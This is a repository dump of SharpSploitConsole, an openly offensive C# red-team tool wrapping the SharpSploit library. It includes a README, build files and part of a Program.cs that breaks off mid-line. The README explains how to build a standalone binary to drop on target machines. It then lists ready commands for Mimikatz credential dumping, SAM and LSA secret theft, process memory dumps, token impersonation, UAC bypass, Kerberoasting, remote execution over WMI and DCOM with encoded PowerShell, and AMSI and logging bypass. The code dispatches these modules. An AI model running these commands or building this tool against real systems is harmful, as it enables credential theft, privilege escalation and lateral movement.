├── sharpsploitimg1.PNG ├── sharpsploitimg2.PNG ├── SharpSploitConsole ├── FodyWeavers.xml ├── App.config ├── packages.config ├── Properties │ └── AssemblyInfo.cs ├── SharpSploitConsole.csproj └── Program.cs ├── SharpSploitConsole.sln ├── .gitattributes ├── .gitignore └── README.md /sharpsploitimg1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/anthemtotheego/SharpSploitConsole/HEAD/sharpsploitimg1.PNG -------------------------------------------------------------------------------- /sharpsploitimg2.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/anthemtotheego/SharpSploitConsole/HEAD/sharpsploitimg2.PNG -------------------------------------------------------------------------------- /SharpSploitConsole/FodyWeavers.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /SharpSploitConsole/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /SharpSploitConsole/packages.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /SharpSploitConsole/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("SharpSploitConsole")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpSploitConsole")] 13 | [assembly: AssemblyCopyright("Copyright © 2018")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("3787435b-8352-4bd8-a1c6-e5a1b73921f4")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpSploitConsole.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.27130.2010 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpSploitConsole", "SharpSploitConsole\SharpSploitConsole.csproj", "{3787435B-8352-4BD8-A1C6-E5A1B73921F4}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Debug|x86 = Debug|x86 13 | Release|Any CPU = Release|Any CPU 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 19 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Debug|Any CPU.Build.0 = Debug|Any CPU 20 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Debug|x64.ActiveCfg = Debug|x64 21 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Debug|x64.Build.0 = Debug|x64 22 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Debug|x86.ActiveCfg = Debug|x86 23 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Debug|x86.Build.0 = Debug|x86 24 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Release|Any CPU.ActiveCfg = Release|Any CPU 25 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Release|Any CPU.Build.0 = Release|Any CPU 26 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Release|x64.ActiveCfg = Release|x64 27 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Release|x64.Build.0 = Release|x64 28 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Release|x86.ActiveCfg = Release|x86 29 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Release|x86.Build.0 = Release|x86 30 | EndGlobalSection 31 | GlobalSection(SolutionProperties) = preSolution 32 | HideSolutionNode = FALSE 33 | EndGlobalSection 34 | GlobalSection(ExtensibilityGlobals) = postSolution 35 | SolutionGuid = {149543D6-75B1-4D0D-A528-B0DD7EC7D1AE} 36 | EndGlobalSection 37 | EndGlobal 38 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | x64/ 19 | x86/ 20 | bld/ 21 | [Bb]in/ 22 | [Oo]bj/ 23 | [Ll]og/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | project.fragment.lock.json 46 | artifacts/ 47 | 48 | *_i.c 49 | *_p.c 50 | *_i.h 51 | *.ilk 52 | *.meta 53 | *.obj 54 | *.pch 55 | *.pdb 56 | *.pgc 57 | *.pgd 58 | *.rsp 59 | *.sbr 60 | *.tlb 61 | *.tli 62 | *.tlh 63 | *.tmp 64 | *.tmp_proj 65 | *.log 66 | *.vspscc 67 | *.vssscc 68 | .builds 69 | *.pidb 70 | *.svclog 71 | *.scc 72 | 73 | # Chutzpah Test files 74 | _Chutzpah* 75 | 76 | # Visual C++ cache files 77 | ipch/ 78 | *.aps 79 | *.ncb 80 | *.opendb 81 | *.opensdf 82 | *.sdf 83 | *.cachefile 84 | *.VC.db 85 | *.VC.VC.opendb 86 | 87 | # Visual Studio profiler 88 | *.psess 89 | *.vsp 90 | *.vspx 91 | *.sap 92 | 93 | # TFS 2012 Local Workspace 94 | $tf/ 95 | 96 | # Guidance Automation Toolkit 97 | *.gpState 98 | 99 | # ReSharper is a .NET coding add-in 100 | _ReSharper*/ 101 | *.[Rr]e[Ss]harper 102 | *.DotSettings.user 103 | 104 | # JustCode is a .NET coding add-in 105 | .JustCode 106 | 107 | # TeamCity is a build add-in 108 | _TeamCity* 109 | 110 | # DotCover is a Code Coverage Tool 111 | *.dotCover 112 | 113 | # NCrunch 114 | _NCrunch_* 115 | .*crunch*.local.xml 116 | nCrunchTemp_* 117 | 118 | # MightyMoose 119 | *.mm.* 120 | AutoTest.Net/ 121 | 122 | # Web workbench (sass) 123 | .sass-cache/ 124 | 125 | # Installshield output folder 126 | [Ee]xpress/ 127 | 128 | # DocProject is a documentation generator add-in 129 | DocProject/buildhelp/ 130 | DocProject/Help/*.HxT 131 | DocProject/Help/*.HxC 132 | DocProject/Help/*.hhc 133 | DocProject/Help/*.hhk 134 | DocProject/Help/*.hhp 135 | DocProject/Help/Html2 136 | DocProject/Help/html 137 | 138 | # Click-Once directory 139 | publish/ 140 | 141 | # Publish Web Output 142 | *.[Pp]ublish.xml 143 | *.azurePubxml 144 | # TODO: Comment the next line if you want to checkin your web deploy settings 145 | # but database connection strings (with potential passwords) will be unencrypted 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 150 | # checkin your Azure Web App publish settings, but sensitive information contained 151 | # in these scripts will be unencrypted 152 | PublishScripts/ 153 | 154 | # NuGet Packages 155 | *.nupkg 156 | # The packages folder can be ignored because of Package Restore 157 | **/packages/* 158 | # except build/, which is used as an MSBuild target. 159 | !**/packages/build/ 160 | # Uncomment if necessary however generally it will be regenerated when needed 161 | #!**/packages/repositories.config 162 | # NuGet v3's project.json files produces more ignoreable files 163 | *.nuget.props 164 | *.nuget.targets 165 | 166 | # Microsoft Azure Build Output 167 | csx/ 168 | *.build.csdef 169 | 170 | # Microsoft Azure Emulator 171 | ecf/ 172 | rcf/ 173 | 174 | # Windows Store app package directories and files 175 | AppPackages/ 176 | BundleArtifacts/ 177 | Package.StoreAssociation.xml 178 | _pkginfo.txt 179 | 180 | # Visual Studio cache files 181 | # files ending in .cache can be ignored 182 | *.[Cc]ache 183 | # but keep track of directories ending in .cache 184 | !*.[Cc]ache/ 185 | 186 | # Others 187 | ClientBin/ 188 | ~$* 189 | *~ 190 | *.dbmdl 191 | *.dbproj.schemaview 192 | *.jfm 193 | *.pfx 194 | *.publishsettings 195 | node_modules/ 196 | orleans.codegen.cs 197 | 198 | # Since there are multiple workflows, uncomment next line to ignore bower_components 199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 200 | #bower_components/ 201 | 202 | # RIA/Silverlight projects 203 | Generated_Code/ 204 | 205 | # Backup & report files from converting an old project file 206 | # to a newer Visual Studio version. Backup files are not needed, 207 | # because we have git ;-) 208 | _UpgradeReport_Files/ 209 | Backup*/ 210 | UpgradeLog*.XML 211 | UpgradeLog*.htm 212 | 213 | # SQL Server files 214 | *.mdf 215 | *.ldf 216 | 217 | # Business Intelligence projects 218 | *.rdl.data 219 | *.bim.layout 220 | *.bim_*.settings 221 | 222 | # Microsoft Fakes 223 | FakesAssemblies/ 224 | 225 | # GhostDoc plugin setting file 226 | *.GhostDoc.xml 227 | 228 | # Node.js Tools for Visual Studio 229 | .ntvs_analysis.dat 230 | 231 | # Visual Studio 6 build log 232 | *.plg 233 | 234 | # Visual Studio 6 workspace options file 235 | *.opt 236 | 237 | # Visual Studio LightSwitch build output 238 | **/*.HTMLClient/GeneratedArtifacts 239 | **/*.DesktopClient/GeneratedArtifacts 240 | **/*.DesktopClient/ModelManifest.xml 241 | **/*.Server/GeneratedArtifacts 242 | **/*.Server/ModelManifest.xml 243 | _Pvt_Extensions 244 | 245 | # Paket dependency manager 246 | .paket/paket.exe 247 | paket-files/ 248 | 249 | # FAKE - F# Make 250 | .fake/ 251 | 252 | # JetBrains Rider 253 | .idea/ 254 | *.sln.iml 255 | 256 | # CodeRush 257 | .cr/ 258 | 259 | # Python Tools for Visual Studio (PTVS) 260 | __pycache__/ 261 | *.pyc -------------------------------------------------------------------------------- /SharpSploitConsole/SharpSploitConsole.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4} 8 | Exe 9 | SharpSploitConsole 10 | SharpSploitConsole 11 | v4.6.1 12 | 512 13 | true 14 | 15 | 16 | publish\ 17 | true 18 | Disk 19 | false 20 | Foreground 21 | 7 22 | Days 23 | false 24 | false 25 | true 26 | 0 27 | 1.0.0.%2a 28 | false 29 | false 30 | true 31 | 32 | 33 | AnyCPU 34 | true 35 | full 36 | false 37 | bin\Debug\ 38 | DEBUG;TRACE 39 | prompt 40 | 4 41 | 42 | 43 | AnyCPU 44 | pdbonly 45 | true 46 | bin\Release\ 47 | TRACE 48 | prompt 49 | 4 50 | 51 | 52 | true 53 | bin\x64\Debug\ 54 | DEBUG;TRACE 55 | full 56 | x64 57 | prompt 58 | MinimumRecommendedRules.ruleset 59 | true 60 | 61 | 62 | bin\x64\Release\ 63 | TRACE 64 | true 65 | pdbonly 66 | x64 67 | prompt 68 | MinimumRecommendedRules.ruleset 69 | true 70 | 71 | 72 | true 73 | bin\x86\Debug\ 74 | DEBUG;TRACE 75 | full 76 | x86 77 | prompt 78 | MinimumRecommendedRules.ruleset 79 | true 80 | 81 | 82 | bin\x86\Release\ 83 | TRACE 84 | true 85 | pdbonly 86 | x86 87 | prompt 88 | MinimumRecommendedRules.ruleset 89 | true 90 | 91 | 92 | 93 | ..\packages\Costura.Fody.3.1.3\lib\net46\Costura.dll 94 | 95 | 96 | False 97 | bin\x64\Debug\SharpSploit.dll 98 | 99 | 100 | 101 | 102 | 103 | False 104 | bin\x64\Debug\System.Management.Automation.dll 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | False 124 | Microsoft .NET Framework 4.6.1 %28x86 and x64%29 125 | true 126 | 127 | 128 | False 129 | .NET Framework 3.5 SP1 130 | false 131 | 132 | 133 | 134 | 135 | 136 | 137 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}. 138 | 139 | 140 | 141 | 142 | 143 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SharpSploitConsole 2 | 3 | Console Application designed to interact with SharpSploit released by @cobbr_io > https://github.com/cobbr/SharpSploit 4 | 5 | SharpSploit is a tool written by @cobbr_io that combines many techniques/C# code from the infosec community and combines it into one sweet DLL. It's awesome so check it out! 6 | 7 | Description 8 | ============ 9 | SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit. By following the instructions below you should be able to embed both the SharpSploit.dll and System.Management.Automation.dll into the SharpSploitConsole binary, creating a standalone exe you can drop on an appropriate target sytem and run over a non-interactive shell (such as beacon). 10 | 11 | This concept can be applied to many C# binaries. For example, we could embed the System.Management.Automation.dll into our favorite C# NoPowershell.exe, creating a binary that doesn't rely on the System.Management.Automation.dll on the target system. 12 | 13 | Lastly, I am aware there are probably thousands of ways to make this better, faster, cooler, stealthier etc. So please free to let me know....in a nice way. :) I also plan to add more modules and improve others. 14 | 15 | Contact at: 16 | - Twitter: @anthemtotheego or @g0ldengunsec 17 | 18 | **Before submitting issues, this tool may not always be updated actively. I encourage you to borrow, add, mod, and/or make your own. Remember, all the awesome code out there (and there is a lot) can be taken/modified to create your own custom tools.** 19 | 20 | ![Alt text](/sharpsploitimg1.PNG?raw=true "SharpSploitConsole") 21 | ![Alt text](/sharpsploitimg2.PNG?raw=true "") 22 | 23 | Setup - Quick and Dirty 24 | ============================== 25 | 26 | **Note: I used Windows 10, Visual Studio 2017 - mileage may vary** 27 | 28 | 1. Download SharpSploit tool from https://github.com/cobbr/SharpSploit.git 29 | 30 | 2. Open up SharpSploit.sln in Visual Studio and compile (make sure to compile for correct architecture) - Should see drop down with Any CPU > Click on it and open Configuration Manager > under platform change to desired architecture and select ok. 31 | 32 | 3. Download SharpSploitConsole tool and open up SharpSploitConsole.sln 33 | 34 | 4. Copy both SharpSploit.dll and System.Management.Automation.dll found in SharpSploit/bin/x64/Debug directory into SharpSploitConsole/bin/x64/Debug folder 35 | 36 | 5. Next we will set up visual studio to embed our DLL's into our exe so we can just have a single binary we can run on our target machine. We will do this by doing the following: 37 | 38 | In visual studio: 39 | 40 | a. Tools > NuGet Package Manager > Package Manager Console 41 | 42 | b. Inside console run: 43 | 44 | Install-Package Costura.Fody 45 | 46 | c. Open up notepad and paste the following code below and save it with the name FodyWeavers.xml inside the SharpSploitConsole directory that holds your bin, obj, properties folders. 47 | 48 | 49 | 50 | 51 | 52 | 53 | 6. Inside visual studio, right click References on the righthand side, choose Add Reference, then browse to the SharpSploitConsole/bin/x64/Debug directory where we put our two DLL's, select them and add them. 54 | 55 | 7. Compile, drop binary on target computer and have fun. 56 | 57 | Examples 58 | ======== 59 | 60 | Note: All commands are case insensitive 61 | 62 | By default all commands can be taken in as command line args, they will be executed and the program will exit (great for remote shells). This looks something like the following: sharpSploitConsole.exe getSystem logonPasswords. Alternatively, if you want to use the interactive console mode, you can use the interact command to get a pseudo-interactive shell. 63 | 64 | Start interactive console mode: 65 | 66 | ```Interact``` 67 | 68 | Mimikatz all the things (does not run DCSync) - requires admin or system: 69 | 70 | ```Mimi-All``` 71 | 72 | Runs a specific Mimikatz command of your choice - requires admin or system: 73 | 74 | ```Mimi-Command privilege::debug sekurlsa::logonPasswords``` 75 | 76 | Runs the Mimikatz command privilege::debug sekurlsa::logonPasswords - requires admin or system: 77 | 78 | ```logonPasswords``` 79 | 80 | Runs the Mimikatz command to retrieve Domain Cached Credentials hashes from registry - requires admin or system: 81 | 82 | ```LsaCache``` 83 | 84 | Runs the Mimikatz command to retrieve LSA Secrets stored in registry - requires admin or system: 85 | 86 | ```LsaSecrets``` 87 | 88 | Retrieve password hashes from the SAM database - requires admin or system: 89 | 90 | ```SamDump``` 91 | 92 | Retrieve Wdigest credentials from registry - requires admin or system: 93 | 94 | ```Wdigest``` 95 | 96 | Retrieve current user: 97 | 98 | ```whoami``` 99 | 100 | ```Username``` 101 | 102 | Impersonate system user - requires admin rights: 103 | 104 | ```GetSystem``` 105 | 106 | Impersonate system user - Impersonate the token of a specified process, requires pid - command requires admin rights: 107 | 108 | ```Impersonate 2918``` 109 | 110 | Bypass UAC - requires binary | command | path to binary - requires admin rights: 111 | 112 | ```BypassUAC cmd.exe ipconfig C:\Windows\System32\``` 113 | 114 | ```BypassUAC cmd.exe "" C:\Windows\System32\``` 115 | 116 | Ends the impersonation of any token, reverts back to initial token associated with current process: 117 | 118 | ```RevertToSelf``` 119 | 120 | Retrieve current working directory: 121 | 122 | ```CurrentDirectory``` 123 | 124 | Retrieve current directory listing: 125 | 126 | ```DirectoryListing``` 127 | 128 | Changes the current directory by appending a specified string to the current working directory: 129 | 130 | ```ChangeDirectory SomeFolder``` 131 | 132 | Retrieve hostname: 133 | 134 | ```Hostname``` 135 | 136 | Retrieve list of running processes: 137 | 138 | ```ProcessList``` 139 | 140 | Creates a minidump of the memory of a running process, requires PID | output location | output name - requires admin: 141 | 142 | ```ProcDump 2198 C:\Users\Username\Desktop memorydump.dmp``` 143 | 144 | Retrieve registry path value, requires full path argument: 145 | 146 | ```ReadRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\BuildNumber``` 147 | 148 | Write to registry, requires full path argument and value argument: 149 | 150 | ```WriteRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\RemoteAccessEnabled 1``` 151 | 152 | Retrieve users of local group remotely, requires computername | groupname | username | password: 153 | 154 | ```NetLocalGroupMembers computerName Administrators domain\username P@55w0rd!``` 155 | 156 | ```NetLocalGroupMembers 192.168.1.20 Administrators .\username P@55w0rd!``` 157 | 158 | Retrieve local groups remotely, requires computername | username | password: 159 | 160 | ```NetLocalGroups computerName domain\username P@55w0rd!``` 161 | 162 | ```NetLocalGroups 192.168.1.20 .\username P@55w0rd!``` 163 | 164 | Retrieve current logged on users remotely, requires computername | username | password: 165 | 166 | ```NetLoggedOnUsers computerName domain\username P@55w0rd!``` 167 | 168 | ```NetLoggedOnUsers 192.168.1.20 .\username P@55w0rd!``` 169 | 170 | Retrieve user sessions remotely, requires computername | username | password: 171 | 172 | ```NetSessions computerName domain\username P@55w0rd!``` 173 | 174 | ```NetSessions 192.168.1.20 .\username P@55w0rd!``` 175 | 176 | Ping systems, requires computernames: 177 | 178 | ```Ping computer1 computer2 computer3 computer4``` 179 | 180 | Port scan systems, requires computername | ports: 181 | 182 | ```PortScan computer1 80 443 445 22 23``` 183 | 184 | Get Domain Users, Grabs specified (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target: 185 | 186 | ```GetDomainUsers``` 187 | 188 | Get Domain Groups, Grabs specified (or all) group objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target: 189 | 190 | ```GetDomainGroups``` 191 | 192 | ```GetDomainGroups -target "Domain Admins"``` 193 | 194 | Get Domain Computers, Grabs specified (or all) computer objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target: 195 | 196 | ```GetDomainComputers``` 197 | 198 | Perform Kerberoasting, Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target 199 | 200 | ```Kerberoast``` 201 | 202 | ```Kerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlService``` 203 | 204 | Run command remotely via WMI, requires computername | username | password | command - requires admin: 205 | 206 | ```WMI computer1 domain\username P@55w0rd! ``` 207 | 208 | ```WMI computer1 .\username P@55w0rd! powershell -noP -sta -w 1 -enc ``` 209 | 210 | Run command remotely via DCOM, requires computername | command | directory | params - requires admin: 211 | 212 | ```DCOM computer1 cmd.exe c:\Windows\System32 powershell -noP -sta -w 1 -enc ``` 213 | 214 | Run shell command: 215 | 216 | ```Shell ipconfig /all``` 217 | 218 | Run powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging: 219 | 220 | ```Powershell -noP -sta -w 1 -enc ``` 221 | 222 | # Currently available options (more to come) 223 | 224 | - **Interact** : Starts interactive console mode, if you are interacting remotely you may not want to use this option 225 | - **Mimi-All** : Executes everything but DCSync, requires admin 226 | - **Mimi-Command** : Executes a chosen Mimikatz command 227 | - **logonPasswords** : Runs privilege::debug sekurlsa::logonPasswords 228 | - **LsaCache** : Retrieve Domain Cached Credentials hashes from registry 229 | - **LsaSecrets** : Retrieve LSA secrets stored in registry 230 | - **SamDump** : Retrieve password hashes from the SAM database 231 | - **Wdigest** : Retrieve Wdigest credentials from registry 232 | - **whoami** : Retrieve current user 233 | - **GetSystem** : Impersonate system user, requires admin rights 234 | - **Impersonate** : Impersonate the token of a specified process, requires pid - command requires admin rights. 235 | - **BypassUAC** : Bypass UAC, requires binary | command | path to binary - requires admin rights 236 | - **RevertToSelf** : Ends the impersonation of any token, reverts back to initial token associated with current process 237 | - **CurrentDirectory** : Retrieve current working directory 238 | - **DirectoryListing** : Retrieve current directory listing 239 | - **ChangeDirectory** : Changes the current directory by appending a specified string to the current working directory 240 | - **Hostname** : Retrieve hostname 241 | - **ProcessList** : Retrieve list of running processes 242 | - **ProcDump** : Creates a minidump of the memory of a running process, requires PID | output location | output name - requires admin 243 | - **Username** : Retrieve current username 244 | - **ReadRegistry** : Retrieve registry path value, requires full path argument 245 | - **WriteRegistry** : Write to registry, requires full path argument | value 246 | - **NetLocalGroupMembers** : Retrieve users of local group remotely, requires computername | groupname | username | password 247 | - **NetLocalGroups** : Retrieve local groups remotely, requires computername | username | password 248 | - **NetLoggedOnUsers** : Retrieve current logged on users remotely, requires computername | username | password 249 | - **NetSessions** : Retrieve user sessions remotely, requires computername | username | password 250 | - **Ping** : Ping systems, requires computernames" 251 | - **PortScan** : Port scan systems, requires computername | ports 252 | - **GetDomainUsers** : Grabs specified (or all) user objects in the target domain, by default will use current user context 253 | - **GetDomainGroups** : Grabs specified (or all) group objects in the target domain, by default will use current user context 254 | - **GetDomainComputers** : Grabs specified (or all) computer objects in the target domain, by default will use current user context 255 | - **Kerberoast** : Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context 256 | - **WMI** : Run command remotely via WMI, requires computername | username | password | command | requires admin 257 | - **DCOM** : Run command remotely via DCOM, requires computername | command | directory | params - requires admin 258 | - **Shell** : Run a shell command 259 | - **Powershell** : Runs a powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging 260 | 261 | -------------------------------------------------------------------------------- /SharpSploitConsole/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Linq; 5 | using System.Text; 6 | 7 | /* 8 | Authors: @anthemtotheego and @g0ldengunsec 9 | License: BSD 3-Clause 10 | Find Sharpsploit: https://github.com/cobbr/SharpSploit 11 | */ 12 | 13 | namespace SharpSploitConsole 14 | { 15 | class Program 16 | { 17 | //Main 18 | static void Main(string[] args) 19 | { 20 | if (args.Length <= 0) 21 | { 22 | art(); 23 | help(); 24 | } 25 | else if (args.Length > 0) 26 | { 27 | if (args[0].ToLower() == "interact") 28 | { 29 | art(); 30 | console(); 31 | } 32 | else 33 | { 34 | if (args.Contains("getsystem", StringComparer.OrdinalIgnoreCase)) 35 | { 36 | getSystem(); 37 | List argsUpdated = args.ToList(); 38 | argsUpdated.RemoveAll(x => x.ToString().Equals("getsystem", StringComparison.OrdinalIgnoreCase)); 39 | args = argsUpdated.ToArray(); 40 | } 41 | else if (args.Contains("impersonate", StringComparer.OrdinalIgnoreCase)) 42 | { 43 | impersonateProcess(args); 44 | List argsUpdated = args.ToList(); 45 | argsUpdated.RemoveRange(argsUpdated.IndexOf("impersonate"), 2); 46 | args = argsUpdated.ToArray(); 47 | 48 | } 49 | commands(args); 50 | } 51 | } 52 | }//End Main 53 | //SharpSploit Command Modules 54 | private static void commands(string[] request) 55 | { 56 | String error = ER(); 57 | try 58 | { 59 | //exit 60 | if (request[0].ToLower() == "exit") 61 | { 62 | return; 63 | } 64 | //help 65 | else if (request[0].ToLower() == "help" || request[0] == "?") 66 | { 67 | help(); 68 | } 69 | //SharpSploit Credential Modules 70 | else if (request[0].ToLower() == "mimi-all") 71 | { 72 | mimiAll(); 73 | } 74 | else if (request[0].ToLower() == "mimi-command") 75 | { 76 | mimiCommand(request); 77 | } 78 | else if (request[0].ToLower() == "logonpasswords") 79 | { 80 | logonPasswords(); 81 | } 82 | else if (request[0].ToLower() == "lsacache") 83 | { 84 | lsaCache(); 85 | } 86 | else if (request[0].ToLower() == "lsasecrets") 87 | { 88 | lsaSecrets(); 89 | } 90 | else if (request[0].ToLower() == "samdump") 91 | { 92 | samDump(); 93 | } 94 | else if (request[0].ToLower() == "wdigest") 95 | { 96 | wDigest(); 97 | } 98 | //Token Class Begin 99 | else if (request[0].ToLower() == "whoami") 100 | { 101 | WhoAmI(); 102 | } 103 | else if (request[0].ToLower() == "getsystem") 104 | { 105 | getSystem(); 106 | } 107 | else if (request[0].ToLower() == "impersonate") 108 | { 109 | impersonateProcess(request); 110 | } 111 | else if (request[0].ToLower() == "bypassuac") 112 | { 113 | bypassUAC(request); 114 | } 115 | else if (request[0].ToLower() == "reverttoself") 116 | { 117 | revertToSelf(); 118 | } 119 | //SharpSploit Enumeration Modules 120 | else if (request[0].ToLower() == "kerberoast") 121 | { 122 | SharpSploit.Enumeration.Domain.DomainSearcher searcher = searcherBuilder(request); 123 | 124 | string[] argsLower = request.Select(s => s.ToLowerInvariant()).ToArray(); 125 | if (Array.IndexOf(argsLower, "-target") > -1) 126 | { 127 | IEnumerable target = new String[] { request[Array.IndexOf(request, "-target") + 1] }; 128 | kerberoast(searcher, target); 129 | } 130 | else 131 | { 132 | kerberoast(searcher); 133 | } 134 | } 135 | else if (request[0].ToLower() == "getdomainusers") 136 | { 137 | SharpSploit.Enumeration.Domain.DomainSearcher searcher = searcherBuilder(request); 138 | 139 | string[] argsLower = request.Select(s => s.ToLowerInvariant()).ToArray(); 140 | if (Array.IndexOf(argsLower, "-target") > -1) 141 | { 142 | IEnumerable target = new String[] { request[Array.IndexOf(request, "-target") + 1] }; 143 | getDomainUsers(searcher, target); 144 | } 145 | else 146 | { 147 | getDomainUsers(searcher); 148 | } 149 | } 150 | else if (request[0].ToLower() == "getdomaingroups") 151 | { 152 | SharpSploit.Enumeration.Domain.DomainSearcher searcher = 